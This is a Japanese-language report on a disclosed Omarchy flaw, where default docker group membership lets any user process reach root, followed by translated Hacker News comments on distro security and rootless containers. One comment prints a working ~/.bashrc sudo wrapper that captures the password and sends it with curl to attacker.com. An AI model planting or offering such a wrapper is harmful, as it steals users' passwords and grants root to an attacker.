Omarchyのデフォルト設定で、任意のユーザープロセスがroot権限を取得可能に
Omarchy: Any User Process Can Escalate to Root
OmarchyのデフォルトのDocker設定に深刻なセキュリティ問題が発見されました。ユーザーがdockerグループに属しているため、実質的にすべてのユーザープロセスがパスワードやsudoなしでroot権限を取得できます。影響を受けるバージョンは4.0.1より前で、最新の3.x ISO(3.8.4)でも影響が確認されています。この問題は責任ある開示プロセスを通じて報告され、すでにパッチが適用されています。ユーザーは4.0.1に更新することが推奨されます。
Dockerグループへの追加はオプトインではなくオプトアウトであり、ユーザーがDockerを使うかどうかに関わらず、デフォルトアカウントにセキュリティ上のトレードオフが適用され、そのトレードオフはユーザーに説明されていませんでした。
HNでの議論
471- concinds
数日前、誰かがUSBディスクリプタをそのままシェルに流し込んでいるのを見つけました。
https://github.com/omacom/omarchy/commit/9285b19d6a72eba3df8...
バイブコードされたディストロは使わないでください。これが修正されるかどうか、特定の脆弱性を気にするかどうかは関係ありません。これは賢明ではありません。そもそもWindowsから乗り換えた理由を思い出してください。
- mike_hearn
LinuxはmacOSとは違い、実際に機能する適切なデスクトップサンドボックスアーキテクチャがありません。つまり、これは一種のセキュリティシアターです。悪意のあるプログラムを実行すると、PATHを改ざんしたり、アプリのローカル脆弱性を悪用して、重要なものを制御できる状態(通常はrootではない)に到達したりできます。例えば、~/.bin/.hidden-shellにカスタムシェルを置き、ターミナルエミュレータを再設定してそれを実行させることができます。
したがって、この種の「脆弱性」はそれほど重要ではないように思えます。Linux上で自分自身としてコードを実行するなら、それはあなたを所有することになります。
macOSでは状況が大きく異なります。広範なコード署名により、すべてのアプリにカーネルが強制する安定したIDが与えられ、簡単に逃れることはできません。カーネルは、インストール方法に関係なく、実行されるすべてのアプリにサンドボックスポリシーを課すことができ、例えば、アプリが~/Documentsを覗いたり、画面を監視したりするのを防ぎます。権限は編集可能で、アップグレードをまたいでも確実に維持されます。そしてrootは無力化されているため、rootを取得してもほとんど意味がなく、UNIX互換性のためだけに存在しています。
残念ながら、AppleスタイルのアーキテクチャをLinuxに実装するのは非常に難しいでしょう。
- thehamkercat
メディアやYouTubeで過剰に宣伝されているディストロに飛びつくべきではないと思います。cachyOSにも同様の波があり、今Omarchyにもそれが来ています。
(例:NetworkChuck、Primeagen?など)
また、archlinuxは今やarchinstall [1]でインストールがはるかに簡単になっているので、その上にさらに意見を押し付けるレイヤーが必要かどうかは疑問です。
- exitb
良くないことですが、これはOmarchy特有の問題として扱うべきではないと思います。通常のユーザーをdockerグループに追加するのは非常に一般的な設定ですから。
- lrvick
公平に言えば、主要なLinuxディストロでは、sudoが完全にセキュリティシアターであるため、マルウェアがrootに昇格するのは簡単です。
マルウェアは~/.bashrcにこれを置いて待つだけでいいのです:
function sudo () {
realsudo=$(which sudo)
read -r -s -p "[sudo] password for $USER: " password
echo "$USER: $password" | \
curl -F 'p=<-' https://attacker.com >/dev/null 2>&1
$realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1
$realsudo "${@:1}"
}
- WhyNotHugo
なぜdockerを非特権ユーザーではなくrootで実行することがこれほど一般的なのか理解できません。
Dockerは何年も前からrootlessモードをサポートしています。私は4年以上前にdocker-rootlessをArch/AURにパッケージ化したので、それだけ長い間存在し安定しています。
確かに、Dockerコンテナ専用のサーバーでは、ネットワークレイテンシのわずかな改善のためにrootで実行することは理にかなうかもしれません。しかし、それ以外では、rootlessが常にデフォルトであるべきです。
- trentnix
Docker設定の問題は報告され、迅速に対処するための変更が行われました。これはシステムがうまく機能している良い例のように思えます。
Omarchyは、私のような開発者がhyprlandを試してコードを書くための簡単な方法のように見えます。また、子供たちがコンピュータに興味を持つための素晴らしい方法でもあります。エージェントハーネスが用意されており、マシンの管理やフリーソフトウェア(少し分かりにくいものも含む)の使用を支援してくれます。
人々がこれについて怒っていることに困惑していますが、ゲートキーパーがどう思うかはもう気にしないことを思い出しました。
- andrewvc
バイブコーディングが行われたボックスがあるなら、その上の何も信頼しないでしょう。だから私は完全に別のマシンでバイブコーディングをします。
私はOmarchyユーザーではありませんが、私たちは今、ほとんどのアクション(LLMがユーザーにrootで実行するよう求めるものも含む)がユーザーの脳以外から発生する世界に生きています。
今後数年間で、信頼と認証についての考え方に変化が訪れるでしょう。それは単にインシデントの深刻度が増すだけの問題です。
- darkwi11ow
なぜrootlessのpodmanを使わないのですか?2026年であって2016年ではありません。Podmanは今日のDockerよりもはるかにうまく機能します。
- pkulak
うわあ...これは本当に示唆的です。これは些細なミスではありません。Dockerのインストールページには、この問題を正確に説明する大きなセクションがあります。各ディストロのwikiのDockerセクションはすべて、この問題を詳細に説明しています。これはPodmanがそもそも作られた理由の80%です。